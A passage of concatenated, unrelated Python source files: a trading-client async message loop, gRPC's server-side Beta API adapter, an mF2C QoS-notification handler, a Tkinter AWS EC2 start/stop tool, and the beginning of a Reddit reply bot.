Engine.strategy_name, Engine.strategy_path, Engine.strategy_id,
Engine.strategy_ord_id, 5000, 1000, CLIENT_API_LOG_LEVEL_DEBUG)
if Engine.client_api.async_ctx is None:
print("ClientAsyncApi Init失败")
return -1
return 0
def on_msg_callback_read_md_stream():
while not Engine.is_quit:
msg = ClientApiStreamMsgT()
if Engine.client_api.client_async_api_wait_md_msg(msg, 1000):
Engine.msg_queue.put(msg)
def on_msg_callback_read_trd_stream():
while not Engine.is_quit:
msg = ClientApiStreamMsgT()
if Engine.client_api.client_async_api_wait_trd_msg(msg, 1000):
Engine.msg_queue.put(msg)
def process_msg():
while not Engine.is_quit:
try:
msg = Engine.msg_queue.get(timeout=1)
# print(f"接收到交易消息 msg_id: {msg.msg_head.msg_id}")
msg_id = msg.msg_head.msg_id
if msg_id == ClientApiMsgTypeT.CLIENT_API_MSG_CLIENT_QUIT.value:
Engine.is_quit = True
print(f"接收到客户端退出消息, 设置退出标志且返回 -1 msg_id: {msg_id}")
elif msg_id == ClientApiMsgTypeT.CLIENT_API_MSG_STRATEGY_EXE_SHUTDOWN.value:
Engine.is_quit = True
Engine.client_api.client_async_api_send_notify_msg(f"{Engine.strategy_name} 被动退出",
CLIENT_API_NOTIFY_LEVEL_IMPORTANT)
print(f"接收到策略被动退出消息, 设置退出标志且返回 -1 msg_id: {msg_id}")
elif msg_id == ClientApiMsgTypeT.CLIENT_API_MSG_STRATEGY_EXE_QUITTED.value:
Engine.is_quit = True
print(f"接收到策略主动退出消息, 设置退出标志且返回 -1 msg_id: {msg_id}")
Engine.handle(msg)
except Empty:
pass
except:
print(traceback.format_exc())
return
def do():
wait_trd_msg = threading.Thread(target=on_msg_callback_read_trd_stream)
wait_md_msg = threading.Thread(target=on_msg_callback_read_md_stream)
process_msg_thread = threading.Thread(target=process_msg)
print("初始化CLIENT ASYNC API成功")
wait_trd_msg.start()
wait_md_msg.start()
process_msg_thread.start()
Engine.client_api.client_async_api_add_strategy()
rc = Engine.client_api.client_async_api_run()
if rc < 0:
print("ClientAsyncApi run 失败")
return -1
print("CLIENT ASYNC API STOP 成功")
Engine.client_api.client_async_api_destory()
print("销毁CLIENT ASYNC API成功")
wait_trd_msg.join()
wait_md_msg.join()
process_msg_thread.join()
return 0
def engine_quit():
Engine.is_quit = True
rc = Engine.client_api.client_async_api_send_quited_msg()
return rc
def send_order(security_id, mkt_id, bs_type, ord_type, ord_qty, ord_price):
Engine.strategy_ord_id += 1
Engine.client_api.client_async_api_send_order_req(security_id, mkt_id, bs_type, ord_type,
Engine.strategy_ord_id, ord_qty,
ord_price, 1)
return Engine.strategy_ord_id
def send_notify_msg(msg, msg_level):
return Engine.client_api.client_async_api_send_notify_msg(msg, msg_level)
def is_owned_by_myself(user_info):
return Engine.client_api.client_is_owned_by_strategy(user_info, Engine.strategy_id)
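# Minimal usage sketch (an assumption about how a strategy script drives this
# module; the handler body is illustrative):
#
#     def my_handler(msg):
#         # inspect msg.msg_head.msg_id and react to trade/market messages
#         pass
#
#     if init(my_handler) == 0:   # reads stream names and strategy ids from sys.argv[1:9]
#         do()                    # starts the md/trd/processing threads and runs the async API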
|
_server_adaptations.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Translates gRPC's server-side API into gRPC's server-side Beta API."""
import collections
import threading
import grpc
from grpc import _common
from grpc.beta import interfaces
from grpc.framework.common import cardinality
from grpc.framework.common import style
from grpc.framework.foundation import abandonment
from grpc.framework.foundation import logging_pool
from grpc.framework.foundation import stream
from grpc.framework.interfaces.face import face
# pylint: disable=too-many-return-statements
_DEFAULT_POOL_SIZE = 8
class _ServerProtocolContext(interfaces.GRPCServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def peer(self):
return self._servicer_context.peer()
def disable_next_response_compression(self):
pass # TODO(https://github.com/grpc/grpc/issues/4078): design, implement.
class _FaceServicerContext(face.ServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def is_active(self):
return self._servicer_context.is_active()
def time_remaining(self):
return self._servicer_context.time_remaining()
def add_abortion_callback(self, abortion_callback):
raise NotImplementedError(
'add_abortion_callback no longer supported server-side!')
def cancel(self):
self._servicer_context.cancel()
def protocol_context(self):
return _ServerProtocolContext(self._servicer_context)
def invocation_metadata(self):
return _common.to_cygrpc_metadata(
self._servicer_context.invocation_metadata())
def initial_metadata(self, initial_metadata):
self._servicer_context.send_initial_metadata(initial_metadata)
def terminal_metadata(self, terminal_metadata):
self._servicer_context.set_terminal_metadata(terminal_metadata)
def code(self, code):
self._servicer_context.set_code(code)
def details(self, details):
self._servicer_context.set_details(details)
def _adapt_unary_request_inline(unary_request_inline):
def adaptation(request, servicer_context):
return unary_request_inline(request,
_FaceServicerContext(servicer_context))
return adaptation
def _adapt_stream_request_inline(stream_request_inline):
def adaptation(request_iterator, servicer_context):
return stream_request_inline(request_iterator,
_FaceServicerContext(servicer_context))
return adaptation
class _Callback(stream.Consumer):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._terminated = False
self._cancelled = False
def consume(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def terminate(self):
with self._condition:
self._terminated = True
self._condition.notify_all()
def consume_and_terminate(self, value):
with self._condition:
self._values.append(value)
self._terminated = True
self._condition.notify_all()
def cancel(self):
with self._condition:
self._cancelled = True
self._condition.notify_all()
def draw_one_value(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._values:
return self._values.pop(0)
elif self._terminated:
return None
else:
self._condition.wait()
def draw_all_values(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._terminated:
all_values = tuple(self._values)
self._values = None
return all_values
else:
self._condition.wait()
def _run_request_pipe_thread(request_iterator, request_consumer,
servicer_context):
thread_joined = threading.Event()
def pipe_requests():
for request in request_iterator:
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.consume(request)
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.terminate()
def stop_request_pipe(timeout): # pylint: disable=unused-argument
thread_joined.set()
request_pipe_thread = _common.CleanupThread(
stop_request_pipe, target=pipe_requests)
request_pipe_thread.start()
def _adapt_unary_unary_event(unary_unary_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_unary_event(request, callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
return callback.draw_all_values()[0]
return adaptation
def _adapt_unary_stream_event(unary_stream_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_stream_event(request, callback,
_FaceServicerContext(servicer_context))
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
def _adapt_stream_unary_event(stream_unary_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_unary_event(
callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
return callback.draw_all_values()[0]
return adaptation
def _adapt_stream_stream_event(stream_stream_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_stream_event(
callback, _FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
class _SimpleMethodHandler(
collections.namedtuple('_MethodHandler', (
'request_streaming', 'response_streaming', 'request_deserializer',
'response_serializer', 'unary_unary', 'unary_stream',
'stream_unary', 'stream_stream',)), grpc.RpcMethodHandler):
pass
def _simple_method_handler(implementation, request_deserializer,
response_serializer):
if implementation.style is style.Service.INLINE:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(
False, False, request_deserializer, response_serializer,
_adapt_unary_request_inline(implementation.unary_unary_inline),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(
False, True, request_deserializer, response_serializer, None,
_adapt_unary_request_inline(implementation.unary_stream_inline),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(True, False, request_deserializer,
response_serializer, None, None,
_adapt_stream_request_inline(
implementation.stream_unary_inline),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_request_inline(
implementation.stream_stream_inline))
elif implementation.style is style.Service.EVENT:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(
False, False, request_deserializer, response_serializer,
_adapt_unary_unary_event(implementation.unary_unary_event),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(
False, True, request_deserializer, response_serializer, None,
_adapt_unary_stream_event(implementation.unary_stream_event),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(
True, False, request_deserializer, response_serializer, None,
None,
_adapt_stream_unary_event(implementation.stream_unary_event),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_stream_event(implementation.stream_stream_event))
def _flatten_method_pair_map(method_pair_map):
method_pair_map = method_pair_map or {}
flat_map = {}
for method_pair in method_pair_map:
method = _common.fully_qualified_method(method_pair[0], method_pair[1])
flat_map[method] = method_pair_map[method_pair]
return flat_map
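# Example of the flattening above (hedged: this assumes grpc's internal
# _common.fully_qualified_method joins group and method as '/group/method',
# which is the key shape _GenericRpcHandler looks up below):
#
#     {('pkg.Service', 'Method'): impl}  ->  {'/pkg.Service/Method': impl}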
class _GenericRpcHandler(grpc.GenericRpcHandler):
def __init__(self, method_implementations, multi_method_implementation,
request_deserializers, response_serializers):
self._method_implementations = _flatten_method_pair_map(
method_implementations)
self._request_deserializers = _flatten_method_pair_map(
request_deserializers)
self._response_serializers = _flatten_method_pair_map(
response_serializers)
self._multi_method_implementation = multi_method_implementation
def service(self, handler_call_details):
method_implementation = self._method_implementations.get(
handler_call_details.method)
if method_implementation is not None:
return _simple_method_handler(
method_implementation,
self._request_deserializers.get(handler_call_details.method),
self._response_serializers.get(handler_call_details.method))
elif self._multi_method_implementation is None:
return None
else:
try:
return None #TODO(nathaniel): call the multimethod.
except face.NoSuchMethodError:
return None
class _Server(interfaces.Server):
def __init__(self, grpc_server):
self._grpc_server = grpc_server
def add_insecure_port(self, address):
return self._grpc_server.add_insecure_port(address)
def add_secure_port(self, address, server_credentials):
return self._grpc_server.add_secure_port(address, server_credentials)
def start(self):
self._grpc_server.start()
def stop(self, grace):
return self._grpc_server.stop(grace)
def __enter__(self):
self._grpc_server.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._grpc_server.stop(None)
return False
def server(service_implementations, multi_method_implementation,
request_deserializers, response_serializers, thread_pool,
thread_pool_size):
generic_rpc_handler = _GenericRpcHandler(
service_implementations, multi_method_implementation,
request_deserializers, response_serializers)
if thread_pool is None:
effective_thread_pool = logging_pool.pool(_DEFAULT_POOL_SIZE
if thread_pool_size is None
else thread_pool_size)
else:
effective_thread_pool = thread_pool
return _Server(
grpc.server(effective_thread_pool, handlers=(generic_rpc_handler,)))
|
handler_qos.py
|
"""
SLAs' notifications handler
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Roi Sucasas Font, Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 27 sept. 2017
@author: Roi Sucasas - ATOS
"""
import threading, time
from lifecycle.logs import LOG
from lifecycle import common as common
from lifecycle.modules import agent_decision as agent_decision
from lifecycle.data import data_adapter as data_adapter
from lifecycle.modules.apps.compss import adapter as compss_adpt
from lifecycle.connectors import connector as connector
from lifecycle.common import STATUS_CREATED_NOT_INITIALIZED
###############################################################################
# QoS Notifications: handles qos enforcement notifications
# {
# "type": "qos_enforcement",
# "data"
# {
# "user_id": "",
# "device_id": "",
# "service_instance_id": "",
# "message": "",
# "num_agents": ""
# }
# }
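# Example "data" payload handled below (values are illustrative;
# handle_qos_notification receives this inner object and only requires the
# 'service_instance_id' and 'num_agents' fields):
#
# {
# "user_id": "user-1",
# "device_id": "device-1",
# "service_instance_id": "si-123",
# "message": "qos violation",
# "num_agents": 3
# }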
# List of service instances being processed
QoS_SERVICE_INSTANCES_LIST = []
# __deploy_COMPSs_in_agent
def __deploy_COMPSs_in_agent(service, service_instance, agent_ip):
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] Deploying COMPSs service instance [" + service_instance['id'] + "] in new agent [" + agent_ip + "] ...")
try:
# 1. create NEW AGENT
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] Creating new service instance agent [" + agent_ip + "]")
new_agent = {"device_id": "-",
"app_type": service['exec_type'],
"ports": service['exec_ports'],
"url": agent_ip,
"status": STATUS_CREATED_NOT_INITIALIZED,
"compss_app_id": "-",
"allow": True,
"container_id": "-",
"master_compss": False,
"agent_param": "not-defined"}
# 2. DEPLOY COMPSs in NEW AGENT
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] allocate service in remote agent [" + new_agent['url'] + "]")
resp_deploy = connector.lifecycle_deploy(service, service_instance, new_agent)
if resp_deploy is not None:
new_agent['status'] = resp_deploy['status']
new_agent['container_id'] = resp_deploy['container_id']
new_agent['ports'] = resp_deploy['ports']
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] service deployed in remote agent: [agent=" + str(new_agent) + "]")
# executes / starts service
resp_start = connector.lifecycle_operation(service, new_agent, "start")
if resp_start is not None:
new_agent['status'] = resp_start['status']
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] execute service in remote agent: [agent=" + str(new_agent) + "]")
return True, new_agent
else:
LOG.error("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] allocate service in remote agent: NOT DEPLOYED")
new_agent['status'] = "not-deployed"
except:
LOG.exception("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] Exception. Returning False ...")
return False, None
# thread
# notification = body['data']
def thr(notification):
try:
global QoS_SERVICE_INSTANCES_LIST
LOG.debug("[lifecycle.events.handler_qos] [thr] Handling QoS notifications [" + str(notification) + "] ...")
# get notification values
service_instance_id = notification['service_instance_id']
service_instance = data_adapter.get_service_instance(service_instance_id)
service = data_adapter.get_service(service_instance['service'])
current_num_agents = len(service_instance['agents']) #service['num_agents']
new_num_agents = notification['num_agents']
appId = data_adapter.serv_instance_get_appid_from_master(service_instance)
if not appId:
LOG.error("[lifecycle.events.handler_qos] [thr] Service instance reconfiguration: 'appId' not found in service_instance!")
LOG.error("[lifecycle.events.handler_qos] [thr] service_instance=" + str(service_instance))
else:
# ADD NEW RESOURCES TO COMPSs MASTER
if new_num_agents > current_num_agents:
LOG.debug("[lifecycle.events.handler_qos] [thr] new_num_agents > current_num_agents")
LOG.info("[lifecycle.events.handler_qos] [thr] Reconfiguring service instance: Adding more nodes to service instance (COMPSs) ...")
# Call to landscaper/recommender
LOG.debug("[lifecycle.events.handler_qos] [thr] Getting list of available agents ...")
available_agents_list = agent_decision.get_available_agents_resources(service) # ==> [{"agent_ip": "192.168.252.41"}, ...]
LOG.debug("[lifecycle.events.handler_qos] [thr] List of available agents: " + str(available_agents_list))
if len(available_agents_list) > 0:
LOG.debug("[lifecycle.events.handler_qos] [thr] Reconfiguring service instance: Checking available resources ...")
for agent in available_agents_list:
LOG.debug("[lifecycle.events.handler_qos] [thr] - checking agent [" + str(agent) + "]")
# add new resources to master if agent does not belong to current execution
if not data_adapter.serv_instance_is_agent_in_service_instance(service_instance, agent["agent_ip"]) and new_num_agents > current_num_agents:
# DEPLOY
LOG.debug("[lifecycle.events.handler_qos] [thr] Deploying COMPSs in agent [" + str(agent) + "] ...")
res, new_agent = __deploy_COMPSs_in_agent(service, service_instance, agent["agent_ip"])
if res:
# ADD TO COMPSs
LOG.debug("[lifecycle.events.handler_qos] [thr] Adding to COMPSs execution ...")
time.sleep(25)
if compss_adpt.add_resources_to_job(service_instance, appId, agent["agent_ip"], new_agent['ports']):
service_instance['agents'].append(new_agent)
data_adapter.update_service_instance(service_instance['id'], service_instance)
current_num_agents = current_num_agents + 1
else:
LOG.error("[lifecycle.events.handler_qos] [thr] Reconfiguring service instance: Error adding new resources / 'appId' not found in service_instance!")
else:
LOG.error("[lifecycle.events.handler_qos] [thr] Handling QoS notifications: available_agents_list is None or is empty ")
LOG.debug("[lifecycle.events.handler_qos] [thr] Waiting 60s to terminate process ...")
time.sleep(60)
# REMOVE RESOURCES FROM COMPSs MASTER
elif new_num_agents < current_num_agents:
LOG.debug("[lifecycle.events.handler_qos] [thr] new_num_agents < current_num_agents")
LOG.info("[lifecycle.events.handler_qos] [thr] Reconfiguring service instance: Removing nodes from service instance (COMPSs) ...")
for agent in service_instance['agents']:
# if agent is not the master, it can be removed
if not data_adapter.serv_instance_is_master(agent) and new_num_agents < current_num_agents:
if compss_adpt.rem_resources_from_job(service_instance, appId, agent["agent_ip"]):
current_num_agents = current_num_agents - 1
LOG.debug("[lifecycle.events.handler_qos] [thr] Waiting 60s to terminate process ...")
time.sleep(60)
else:
LOG.debug("[lifecycle.events.handler_qos] [thr] new_num_agents = current_num_agents")
LOG.debug("[lifecycle.events.handler_qos] [thr] Waiting 10s to terminate process ...")
time.sleep(10)
LOG.debug("[lifecycle.events.handler_qos] [thr] Removing service instance id from QoS_SERVICE_INSTANCES_LIST ...")
QoS_SERVICE_INSTANCES_LIST.remove(notification['service_instance_id'])
LOG.debug("[lifecycle.events.handler_qos] [thr] QoS notifications handled")
except:
LOG.exception('[lifecycle.events.handler_qos] [thr] Exception')
QoS_SERVICE_INSTANCES_LIST.remove(notification['service_instance_id'])
# __check_service_instance_id: check if service instance is still being processed
def __check_service_instance_id(service_instance_id):
for sid in QoS_SERVICE_INSTANCES_LIST:
if sid == service_instance_id:
LOG.warning("[lifecycle.events.handler_qos] [__check_notification] service instance [" + service_instance_id + "] is being processed")
return False
LOG.debug("[lifecycle.events.handler_qos] [__check_notification] service instance [" + service_instance_id + "] is NOT being processed")
return True
# Handle QoS violations
def handle_qos_notification(notification):
LOG.info("########################################################################################")
LOG.info("######## QoS ENFORCEMENT")
try:
global QoS_SERVICE_INSTANCES_LIST
LOG.info("[lifecycle.events.handler_qos] [handle_qos_notification] service_instance_id: notification: " + str(notification))
if not 'num_agents' in notification or not 'service_instance_id' in notification:
LOG.error("[lifecycle.events.handler_qos] [handle_qos_notification] 'num_agents' / 'service_instance_id' parameters not found in notification!")
return common.gen_response(406, 'Error', 'parameter num_agents / service_instance_id not found in qos notification', str(notification))
# handle notification
if __check_service_instance_id(notification['service_instance_id']):
LOG.info("[lifecycle.events.handler_qos] [handle_qos_notification] Processing request...")
QoS_SERVICE_INSTANCES_LIST.append(notification['service_instance_id'])
t = threading.Thread(target=thr, args=(notification,))
t.start()
return common.gen_response_ok('QoS Notification is being processed...', 'notification', str(notification))
LOG.info("[lifecycle.events.handler_qos] [handle_qos_notification] Request not processed.")
return common.gen_response_ok("QoS Notification was not processed: List of current service instances being processed: " + str(QoS_SERVICE_INSTANCES_LIST),
"notification",
str(notification))
except:
LOG.exception('[lifecycle.events.handler_qos] [handle_qos_notification] Exception')
return common.gen_response(500, 'Exception', 'notification', str(notification))
|
main.py
|
from threading import Thread, Event
import tkinter as tk
from tkinter import messagebox
import boto3
import time
import configparser
event_configuration_ready = Event()
def server_monitor():
event_configuration_ready.wait()
global ec2
ec2 = boto3.client('ec2', aws_access_key_id=config['default']['ACCESS_KEY'], aws_secret_access_key=config['default']['SECRET_KEY'], region_name=config['default']['REGION'])
while True:
response = ec2.describe_instances(InstanceIds=[config['default']['INSTANCE_ID']])
server_state = response['Reservations'][0]['Instances'][0]['State']['Name'].lower()
tk_server_status['text'] = server_state.capitalize()
# check current state
if server_state == 'running':
# stop the server
tk_button_on_off.configure(state='active')
tk_button_on_off['text'] = f'Stop server'
tk_server_status.configure(bg='green', fg='azure')
elif server_state == 'stopped':
# start the server
tk_button_on_off.configure(state='active')
tk_button_on_off['text'] = f'Start server'
tk_server_status.configure(bg='red3', fg='azure')
else:
# do nothing because the server is pending
tk_server_status.configure(bg='yellow', fg='black')
tk_button_on_off.configure(state='disabled')
time.sleep(0.5)
def tk_button_on_off_on_click():
server_state = tk_server_status['text'].lower()
# check current state
if server_state == 'running':
# stop the server
ec2.stop_instances(InstanceIds=[config['default']['INSTANCE_ID']])
elif server_state == 'stopped':
# start the server
ec2.start_instances(InstanceIds=[config['default']['INSTANCE_ID']])
else:
# do nothing because the server is pending
return
def tk_about_on_click():
messagebox.showinfo('About', 'Made with love by @debemdeboas on GitHub', master=root)
def tk_configure_on_click():
configuration = tk.Tk()
configuration.geometry('500x100')
configuration.title('Server Configuration')
configuration.wm_resizable(False, False)
configuration.iconbitmap('icon.ico')
tk_label_access_key = tk.Label(configuration, text='Access key:')
tk_entry_access_key = tk.Entry(configuration, width=70)
tk_label_access_key.grid(row=0, column=0)
tk_entry_access_key.grid(row=0, column=1)
tk_entry_access_key.delete(0, tk.END)
tk_entry_access_key.insert(0, config['default']['ACCESS_KEY'])
tk_label_secret_key = tk.Label(configuration, text='Secret key:')
tk_entry_secret_key = tk.Entry(configuration, width=70)
tk_label_secret_key.grid(row=1, column=0)
tk_entry_secret_key.grid(row=1, column=1)
tk_entry_secret_key.delete(0, tk.END)
tk_entry_secret_key.insert(0, config['default']['SECRET_KEY'])
tk_label_region = tk.Label(configuration, text='Region:')
tk_entry_region = tk.Entry(configuration, width=70)
tk_label_region.grid(row=2, column=0)
tk_entry_region.grid(row=2, column=1)
tk_entry_region.delete(0, tk.END)
tk_entry_region.insert(0, config['default']['REGION'])
tk_label_instance_id = tk.Label(configuration, text='Instance ID:')
tk_entry_instance_id = tk.Entry(configuration, width=70)
tk_label_instance_id.grid(row=3, column=0)
tk_entry_instance_id.grid(row=3, column=1)
tk_entry_instance_id.delete(0, tk.END)
tk_entry_instance_id.insert(0, config['default']['INSTANCE_ID'])
def set_and_close():
global config
config.set('default', 'ACCESS_KEY', tk_entry_access_key.get())
config.set('default', 'SECRET_KEY', tk_entry_secret_key.get())
config.set('default', 'REGION', tk_entry_region.get())
config.set('default', 'INSTANCE_ID', tk_entry_instance_id.get())
# validate configuration
try:
boto3.client('ec2', aws_access_key_id=config['default']['ACCESS_KEY'], aws_secret_access_key=config['default']['SECRET_KEY'], region_name=config['default']['REGION'])
config.write(open('config.ini', 'w'))
ready()
except:
# invalid configuration
tk_server_status['text'] = 'Invalid configuration'
configuration.destroy()
configuration.protocol('WM_DELETE_WINDOW', set_and_close)
configuration.mainloop()
def ready():
event_configuration_ready.set()
root = tk.Tk()
root.geometry('350x180')
root.title('AWS EC2 Manager')
root.wm_resizable(False, False)
root.iconbitmap('icon.ico')
tk_status = tk.Label(text='Server status:', pady=5)
tk_status.pack()
tk_server_status = tk.Label(text='Waiting configuration', width=20, height=2, font=('Arial', 14))
tk_server_status.pack(pady=10)
tk_button_on_off = tk.Button(text='Waiting...', width=25, height=2, state='disabled', command=tk_button_on_off_on_click)
tk_button_on_off.pack()
tk_menubar = tk.Menu(root)
tk_about_menu = tk.Menu(root, tearoff=0)
tk_about_menu.add_command(label='About', command=tk_about_on_click)
tk_menubar.add_command(label='Configure', command=tk_configure_on_click)
tk_menubar.add_cascade(label='Help', menu=tk_about_menu)
root.config(menu=tk_menubar)
# load configuration
config = configparser.ConfigParser()
config.add_section('default')
config['default'] = {'ACCESS_KEY': '', 'SECRET_KEY': '', 'REGION': '', 'INSTANCE_ID': ''}
config.read('config.ini')
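# Expected config.ini layout (values below are placeholders, not real credentials):
#
# [default]
# ACCESS_KEY = AKIA...
# SECRET_KEY = ...
# REGION = us-east-1
# INSTANCE_ID = i-0123456789abcdef0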
if config['default']['ACCESS_KEY'] != '' and \
config['default']['SECRET_KEY'] != '' and \
config['default']['REGION'] != '' and \
config['default']['INSTANCE_ID'] != '':
ready()
# start
Thread(target=server_monitor, daemon=True).start()
root.mainloop()
|
app.py
|
#!/usr/bin/env python3
# The MIT License (MIT)
# Copyright (c) 2016 RascalTwo @ therealrascaltwo@gmail.com
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import json
import time
import praw
import random
import logging
import logging.handlers
import requests
import threading
class Thread():
def __init__(self, function, name=None, args=None):
self.function = function
thread = threading.Thread(target=self.function, name=name, args=args)
thread.daemon = True
thread.start()
class WeDidItReddit(object):
def __init__(self):
self.processed = self._load_file("data/processed.json")
self.messages = self._load_file("messages.json")
self.config = self._load_file("config.json")
if "comments" not in self.processed:
self.processed["comments"] = []
self.io = {
"data/processed.json": {
"save": False,
"attribute": "processed"
}
}
self.uptime = 0
self.reply_to = []
self.reddit = praw.Reddit(self.config["user_agent"])
self.reddit.login(self.config["username"],
self.config["password"],
disable_warning="True")
def _load_file(self, name):
try:
with open(name, "r") as reading_file:
return json.loads(reading_file.read())
except Exception as exception:
logger.exception(exception)
return {}
def _save_file(self, name, attribute):
with open(name, "w") as writing_file:
writing_file.write(json.dumps(getattr(self, attribute)))
def mark_for_saving(self, name):
if not self.io[name]["save"]:
self.io[name]["save"] = True
def start(self):
self.running = True
rates = {}
for process in self.config["rates"]:
if self.config["rates"][process] in rates:
rates[self.config["rates"][process]].append(process.capitalize())
else:
rates[self.config["rates"][process]] = [process.capitalize()]
log(self.messages["thread_init"],
{"num": 1, "thread_name": "Comments"})
for rate in rates:
rates[rate].sort()
thread_name = "-".join(rates[rate])
log(self.messages["thread_init"],
{"num": list(rates.keys()).index(rate) + 2, "thread_name": thread_name})
Thread(self._loop_runner,
thread_name,
[[getattr(self, "_{}_loop".format(loop.lower())) for loop in rates[rate]], rate])
for comment in praw.helpers.comment_stream(self.reddit, "all+" + "+".join(self.config["subreddits"]), verbosity=0):
if not self.running:
break
if comment.id in self.processed["comments"]:
continue
if self.should_reply_to(comment):
log(self.messages["phrase_found"], {"comment": comment})
self.reply_to.append(comment)
self.add_comment_id(comment.id)
self.mark_for_saving("data/processed.json")
def stop(self):
self.running = False
def _loop_runner(self, loops, rate):
while self.running:
for loop in loops:
loop()
time.sleep(rate)
def _io_loop(self):
for file in self.io:
if self.io[file]["save"]:
self._save_file(file, self.io[file]["attribute"])
self.io[file]["save"] = False
def _uptime_loop(self):
log(self.messages["uptime"], {"uptime": self.uptime})
self.uptime += self.config["rates"]["uptime"]
def add_comment_id(self, id):
self.processed["comments"].append(id)
if len(self.processed["comments"]) > 10000:
self.processed["comments"] = self.processed["comments"][5000:-1]
def should_reply_to(self, comment):
if comment.author.name in self.config["ignored_users"]:
return False
if comment.subreddit.display_name in self.config["ignored_subreddits"]:
return False
for phrase in self.config["phrases"]:
if phrase.lower() in comment.body.lower():
return True
return False
def get_formated_message(self, comment):
return ("\n".join(self.config["reply_message"])
.format(comment=comment))
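# Rough shape of config.json as referenced throughout this class (keys taken
# from the lookups above; every value here is a made-up placeholder). Rate
# names must match the _<name>_loop methods, i.e. _io_loop and _uptime_loop:
#
# {
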